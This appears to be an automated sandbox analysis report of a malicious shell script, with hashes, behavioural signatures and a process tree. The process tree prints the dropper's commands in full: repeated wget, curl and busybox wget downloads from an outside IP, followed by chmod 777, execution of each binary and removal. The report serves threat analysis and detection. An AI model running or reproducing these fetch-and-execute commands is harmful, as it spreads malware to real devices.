Analysis
-
max time kernel
60s -
max time network
62s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
-
Size
10KB
-
MD5
d230b0059d55644a966d0f2b3a653b23
-
SHA1
003616a6507ccbca767f2e56341b347b94f487da
-
SHA256
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2
-
SHA512
a1badc3ffaa64936805465c8e74e14083c226341b67e35b985dee197f0a8487e2d4c99fcb203e633dd67e60963b748b38a743e4d94b48038d381bfdd460e2f4f
-
SSDEEP
96:iwrwrw7vQ4vx64/jk3WKJsPGOhC+tlxnAltsw/JlJdJgJRJNJ1ChSkdz/jk3WK8i:ik4ET564/jk3vJsbIW6/jk3v3lk4ETgB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 961 chmod 808 chmod 901 chmod 731 chmod 754 chmod 788 chmod 820 chmod 913 chmod 919 chmod 925 chmod 973 chmod 745 chmod 907 chmod 943 chmod 859 chmod 883 chmod 889 chmod 955 chmod 865 chmod 931 chmod 949 chmod 967 chmod 871 chmod 877 chmod 895 chmod 739 chmod 814 chmod 937 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH 733 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h 740 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM 746 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 755 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 790 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 809 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 815 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B 821 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg 860 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 866 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy 872 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc 878 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 884 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw 890 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 896 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 902 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 908 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 914 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 920 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy 926 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc 932 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 938 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B 944 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg 950 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw 956 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH 962 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h 968 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM 974 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc curl File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH curl File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM curl File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg curl File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 curl File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy curl File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B curl File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B curl File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw curl File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h curl File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM curl
Processes
-
/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:710
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:728
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:734
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:738
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:744
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:750
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:772
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:807
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:813
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:819
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:836
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:864
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:870
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:876
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:882
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:888
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:894
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:900
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:906
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:912
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:918
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:924
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:930
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:932
